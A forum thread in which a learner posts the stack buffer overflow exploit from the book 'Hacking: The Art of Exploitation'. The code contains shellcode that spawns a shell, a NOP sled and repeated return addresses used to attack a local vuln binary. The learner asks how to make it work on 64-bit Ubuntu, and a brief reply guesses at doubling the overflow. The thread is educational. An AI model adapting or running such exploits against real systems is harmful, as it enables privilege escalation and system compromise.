art of exploitation example help

Hello all,
I am starting with the book "Hacking, The art of Exploitation" and in the first example vuln.c there is a simple overflow attack (see below). However, it does not work on my 64bit Ubuntu and I get that this is from 2003 and things have changed. Is there a modification that can be done to this code to get it to work. I read something about using the existing *argv pointer but there was no explanation. Thank you to any help.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#include <stdlib.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long sp(void) {__asm__("movl %esp, %eax");}

int main(int argc, char *argv[]) {

    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("Stack pointer (ESP) : 0x%x\n", esp);
    printf("  Offset from ESP : 0x%x\n", offset);
    printf("Desired return Addr : 0x%x\n", ret);

    buffer = malloc(600);

    ptr = buffer;
    addr_ptr = (long*)ptr;

    for(i=0; i < 600; ++i)
    {*(addr_ptr++) = ret; }

    for(i=0;i<200;++i)
    {buffer[i] = '\x90';}

    ptr = buffer + 200;
    for(i=0;i<strlen(shellcode);++i)
    {*(ptr++) = shellcode[i];}

    buffer[600-1] = 0;

    execl("./vuln", "vuln", buffer, 0);

    free(buffer);
}
closed account (Dy7SLyTq)
i don't have a lot of time to look at it because im busy, but my guess would be you need to double what you are using to overflow
Topic archived. No new replies allowed.